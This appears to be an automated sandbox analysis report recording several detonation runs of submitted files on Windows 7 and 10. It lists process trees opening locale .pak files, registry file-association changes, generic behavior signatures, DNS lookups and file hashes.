| PID 2524 wrote to memory of 2752 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2524 wrote to memory of 2752 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2524 wrote to memory of 2752 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sl.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sl.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sl.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | bf5a32136a6370e3e42a924dc1a36a9d |
| SHA1 | 7c11196ab0a439a46dbbb8fb2a07da16f41ded71 |
| SHA256 | ff6923d641ef2fad3a916bf82d428f0d3daaacadf4019f42e72f3adee689a682 |
| SHA512 | ffd638373c5899850e3ec05c403f86cd1492184af5d7a93690d9f8310a0e669ce62f75bed2697a353f50eeba1b0612703ee71e8faec3e214ba1fb68c124fae7e |
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240221-en
Max time kernel
119s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2248 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2248 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2248 wrote to memory of 2700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2700 wrote to memory of 2728 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2728 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2728 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2700 wrote to memory of 2728 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | e43904e41f87b3b5818abc4574826e13 |
| SHA1 | edf49c1baa657baf7de436bfd63bc296d3305126 |
| SHA256 | fc19119446a24090f9c3d95a5c024889c2bc9cd22c40a2bd03e0843300d233b7 |
| SHA512 | 331099a0c9375b4a2f172eef123d2c1ce15a9028ea2c96c952a689c78a77418ef5a76b50bffbe13b8b171c82b95c3ab4a9c96d29419350f978fa2817d04e97ee |
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240611-en
Max time kernel
117s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1244 wrote to memory of 2656 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1244 wrote to memory of 2656 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1244 wrote to memory of 2656 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2656 wrote to memory of 2536 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2656 wrote to memory of 2536 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2656 wrote to memory of 2536 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2656 wrote to memory of 2536 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ru.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\ru.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\ru.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 81d85baab9a88e782381c119a47352e6 |
| SHA1 | e902493002b5ed37e9092aea0d53df3833c3f293 |
| SHA256 | ca8413c747403880a907b898d90ae542be4f018492a8d31a401161c15c56d57d |
| SHA512 | c1ce839c9fb9a74bd61f36ada58f9b5e8aba5fba0d998d4a029f73a7ef98a0c3aeb784f1b7c13a766092e73d6dcbddf082bdc2f160a19162476f49c9c1d36845 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240611-en
Max time kernel
145s
Max time network
157s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sr.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240508-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 220
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240611-en
Max time kernel
121s
Max time network
128s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1760 wrote to memory of 2704 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1760 wrote to memory of 2704 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1760 wrote to memory of 2704 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2704 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2704 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2704 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2704 wrote to memory of 2732 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pl.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\pl.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\pl.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | ffce091b7bfe7f0b83e542c1cb995010 |
| SHA1 | c934568009c8aff2916fb7c7955831428d1b6f96 |
| SHA256 | 677cfe4be64b1df02458ce28b36a7e1dee488212581e8792857db00640da51fc |
| SHA512 | 439e2fc709afec74abc57d7d1916256b6eb563e7439719df39fb87ebafa500063048d52cfbd5d7ddb24795df1817fc70066b29571b6981ba01a84ad49a1cb7fd |
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
140s
Max time network
163s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pl.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240220-en
Max time kernel
120s
Max time network
129s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2128 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2128 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2128 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2644 wrote to memory of 2928 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2644 wrote to memory of 2928 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2644 wrote to memory of 2928 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2644 wrote to memory of 2928 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ro.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\ro.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\ro.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 423a41964c7d2f46d8f4053e51b77f38 |
| SHA1 | 4c01567eeb729109d5b46add8e10ca4e1de6a5bb |
| SHA256 | 47f4b4bfaa44ad3f2eb7f027915caed4c6b973689b802ad72798c13aa363191a |
| SHA512 | dc75aad8c806bcc43314d6f66c8d7b30791c79866e4d4db73336924acbca42ba38ced682b9884fffd46d15e4b356ec1d490d86aa864a21765f325e9a3e3947d4 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win10v2004-20240508-en
Max time kernel
59s
Max time network
55s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ru.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win7-20240611-en
Max time kernel
120s
Max time network
137s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1176 wrote to memory of 2668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1176 wrote to memory of 2668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1176 wrote to memory of 2668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2668 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2668 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2668 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2668 wrote to memory of 2576 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sk.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sk.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sk.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5036b5da3393fc13541608ec12fc78b8 |
| SHA1 | 2eef0cb104a61d476f81de085f1dcb5c322681aa |
| SHA256 | e84f1f8e0b8ccd89f1a13de00ffc798591cfac34592f036d75abfa9122627c4f |
| SHA512 | 58dd7bd5e80498ea93f092a89b7ab83b2af9a2b0e9031b5f30c90e981629a6043d67225321ceb032de137ea56b6fb431876bf8d572ca290b917f8ea8c4ba77b7 |
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
59s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\te.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240611-en
Max time kernel
59s
Max time network
133s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
